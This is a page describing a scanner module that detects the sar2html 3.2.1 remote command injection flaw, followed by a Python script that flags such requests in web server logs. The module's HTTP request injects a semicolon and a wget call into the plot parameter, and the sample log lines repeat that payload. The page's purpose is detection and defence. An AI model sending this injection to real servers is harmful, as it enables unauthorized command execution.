By kannthu
The "sar2html 3.2.1 - Remote Command Injection" module is designed to detect a vulnerability in the SAR2HTML software. SAR2HTML is a tool used for generating graphical reports from system activity data collected by the SAR command. This module focuses on a specific version of SAR2HTML (3.2.1) and identifies a critical remote command injection vulnerability.
This vulnerability is classified as critical. It allows a remote attacker to execute arbitrary commands on the target system through a command injection flaw in the index.php script of SAR2HTML.
This module was authored by gy741.
Successful exploitation can lead to unauthorized access, data theft, system compromise, and potential disruption of services.
The module works by sending a specially crafted HTTP request to the target system's index.php script. The request carries a command injection payload in the plot query parameter: a semicolon followed by a wget command that fetches the module's interaction URL. If the target runs SAR2HTML 3.2.1 and is vulnerable, it executes the injected command and contacts that URL.
Here is an example of the HTTP request used by the module:
GET /index.php?plot=;wget%20http://{%InteractionURL%} HTTP/1.1
Host: {%Hostname%}
Accept: */*
The module also includes matching conditions to ensure accurate detection. In this case, it checks for the "http" protocol in the interaction recorded for the interaction URL; its presence indicates a successful match.
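The same request shape can be searched for in web server access logs. The Python below is an added example, not part of the Vidoc module or of SAR2HTML: it flags requests to index.php whose plot parameter contains shell metacharacters after percent-decoding. The log lines, the /sar2html/ path, the benign value and the metacharacter set are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote
# Request line inside a common/combined log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Assumed set of characters that let a value break out of a shell command.
SHELL_META = re.compile(r"[;|&`$<>\r\n]")

def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding (%253B -> %3B -> ;)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_plot_value(log_line):
    """Return the decoded `plot` value if it holds shell metacharacters, else None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.lower().endswith("index.php"):
        return None
    # Split on "&" only: the page's payload puts a raw ";" inside the value.
    for pair in parts.query.split("&"):
        key, _, raw = pair.partition("=")
        if unquote(key) != "plot":
            continue
        value = decode_fully(raw.replace("+", " "))
        if SHELL_META.search(value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged log entry."""
    found = ((n, suspicious_plot_value(line)) for n, line in enumerate(lines, 1))
    return [(n, v) for n, v in found if v is not None]

# Constructed sample log lines (documentation addresses, .invalid host).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?plot=;wget%20http://oob.example.invalid/ HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /sar2html/index.php?plot=%253Bwget%2520http://oob.example.invalid/ HTTP/1.1" 200 512',
    '198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?plot=LINUX HTTP/1.1" 200 2048',
    '198.51.100.4 - - [01/Jan/2024:10:01:30 +0000] "GET /about.php?plot=;wget%20http://oob.example.invalid/ HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

A hit shows only that such a request was received; whether the command ran depends on the installed SAR2HTML version.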